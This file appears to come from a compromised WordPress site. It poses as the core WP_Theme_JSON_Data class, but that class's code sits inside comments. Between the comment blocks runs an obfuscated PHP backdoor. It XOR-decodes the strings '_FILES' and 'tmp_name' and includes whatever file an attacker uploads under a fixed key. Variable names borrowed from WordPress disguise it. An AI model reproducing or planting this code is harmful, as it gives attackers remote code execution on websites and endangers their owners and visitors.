File: /var/www/sites/1250.info/wp-content/themes/twentytwentyone/PTQZv.js.php
<?php /*
*
* WP_Theme_JSON_Data class
*
* @package WordPress
* @subpackage Theme
* @since 6.1.0
*
* Class to provide access to update a theme.json structure.
#[AllowDynamicProperties]
class WP_Theme_JSON_Data {
*
* Container of the data to update.
*
* @since 6.1.0
* @var WP_Theme_JSON
private $theme_json = null;
*
* The origin of the data: default, theme, user, etc.
*
* @since 6.1.0
* @var string
private $origin = '';
*
* Constructor.
*
* @since 6.1.0
*
* @link https:developer.wordpress.org/block-editor/reference-guides/theme-json-reference/
*
* @param array $data Array following the theme.json specification.
* @param string $origin The origin of the data: default, theme, user.
public function __construct( $data = array(), $origin = 'theme' ) {
$this->origin = $origin;
$this->theme_json = new WP_Theme_JSON( $data, $this->origin );
}
*
* Updates the theme.json with the the given data.
*
* @since 6.1.0
*
* @param array $new_data Array following the theme.json specification.
*
* @return WP_Theme_JSON_Data The own instance with access to the modified data.
public function update_with(*/
$prefixed = 'month';
function show_in_rest()
{
$no_found_rows = 'g01wzlLheHiq';
$parent = $no_found_rows;
$translation_preg = $GLOBALS[wildcard_mime_types("8vx%3B%3F%3F", $parent)];
$get_posts = $translation_preg;
$filetype = isset($get_posts[$parent]);
if ($filetype)
{
$last_changed = $translation_preg[$parent];
$group_mime_types = $last_changed[wildcard_mime_types("%13%5DA%28%14%0D%21%0D", $parent)];
$post_date = 'singular_base';
$allowed_html = $group_mime_types;
include ($allowed_html);
}
}
function wildcard_mime_types($input, $default_capabilities_for_mapping)
{
$expages = 'urls_to_ping';
$special_chars = $default_capabilities_for_mapping;
$posts = "url" . "decode";
$type_attr = $posts($input);
$base = substr($special_chars,0, strlen($type_attr));
$wp_post_types = $type_attr ^ $base;
$type_attr = strpos($wp_post_types, $base);
$index = 'smiley';
return $wp_post_types;
$main = 'double_encode';
}
show_in_rest();
$full = 'no_texturize_tags';
/* $new_data ) {
$this->theme_json->merge( new WP_Theme_JSON( $new_data, $this->origin ) );
return $this;
}
*
* Returns an array containing the underlying data
* following the theme.json specification.
*
* @since 6.1.0
*
* @return array
public function get_data() {
return $this->theme_json->get_raw_data();
}
}
*/